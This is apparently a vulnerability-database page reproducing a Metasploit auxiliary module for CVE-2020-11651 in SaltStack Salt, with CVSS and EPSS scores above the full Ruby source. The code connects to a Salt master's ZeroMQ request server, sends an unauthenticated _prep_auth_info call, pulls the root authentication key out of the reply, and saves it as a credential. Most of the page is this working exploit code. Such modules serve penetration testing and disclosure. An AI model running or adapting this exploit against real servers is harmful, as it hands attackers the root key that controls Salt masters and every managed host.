Lucene search

Wvu, F-Secure, metasploit.comPACKETSTORM:180608

HistoryAug 31, 2024 - 12:00 a.m.

SaltStack Salt Master Server Root Key Disclosure

2024-08-3100:00:00

wvu, F-Secure, metasploit.com

packetstormsecurity.com

saltstack salt

master server

unauthenticated access

zeromq

root key

admin commands

vmware vrealize operations manager

cisco modeling labs corporate edition

virl-pe

ubuntu 18.04

vulhub docker image

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

EPSS

0.975

Percentile

100.0%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::ZeroMQ  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'SaltStack Salt Master Server Root Key Disclosure',  
'Description' => %q{  
This module exploits unauthenticated access to the _prep_auth_info()  
method in the SaltStack Salt master's ZeroMQ request server, for  
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the  
root key used to authenticate administrative commands to the master.  
  
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as  
well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual  
Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,  
1.3, 1.5, and 1.6 in certain configurations, are known to be affected  
by the Salt vulnerabilities.  
  
Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as  
well as Vulhub's Docker image.  
},  
'Author' => [  
'F-Secure', # Discovery  
'wvu' # Module  
],  
'References' => [  
['CVE', '2020-11651'], # Auth bypass (used by this module)  
['CVE', '2020-11652'], # Authed directory traversals (not used here)  
['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],  
['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],  
['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],  
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],  
['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']  
],  
'DisclosureDate' => '2020-04-30', # F-Secure advisory  
'License' => MSF_LICENSE,  
'Actions' => [  
['Dump', { 'Description' => 'Dump root key from Salt master' }]  
],  
'DefaultAction' => 'Dump',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliability' => []  
}  
)  
)  
  
register_options([  
Opt::RPORT(4506)  
])  
end  
  
def run  
# These are from Msf::Exploit::Remote::ZeroMQ  
zmq_connect  
zmq_negotiate  
  
unless (root_key = extract_root_key(yeet_prep_auth_info))  
print_error('Could not find root key in serialized auth info')  
  
# Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce  
return Exploit::CheckCode::Safe  
end  
  
print_good("Root key: #{root_key}")  
  
# I hate this API, but store the root key in creds, too  
create_credential_and_login(  
workspace_id: myworkspace_id,  
module_fullname: fullname,  
origin_type: :service,  
address: rhost,  
port: rport,  
protocol: 'tcp',  
service_name: 'salt/zeromq',  
username: 'root',  
private_data: root_key,  
private_type: :password  
)  
  
# Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce  
Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!  
rescue EOFError, Rex::ConnectionError => e  
print_error("#{e.class}: #{e.message}")  
Exploit::CheckCode::Unknown  
ensure  
# This is from Msf::Exploit::Remote::ZeroMQ  
zmq_disconnect  
end  
  
def yeet_prep_auth_info  
print_status("Yeeting _prep_auth_info() at #{peer}")  
  
zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))  
  
unless (res = sock.get_once)  
fail_with(Failure::Unknown, 'Did not receive auth info')  
end  
  
unless res.match(/user.+UserAuthenticationError.+root/m)  
fail_with(Failure::UnexpectedReply,  
"Did not receive serialized auth info: #{res.inspect}")  
end  
  
vprint_good('Received serialized auth info')  
  
# HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load"  
res[4..]  
end  
  
def extract_root_key(auth_info)  
# Fetch root key from appropriate index of deserialized data, presumably  
MessagePack.unpack(auth_info)[2]&.fetch('root')  
rescue EOFError, KeyError, MessagePack::MalformedFormatError => e  
print_error("#{__method__} failed: #{e.message}")  
nil  
end  
  
end  
`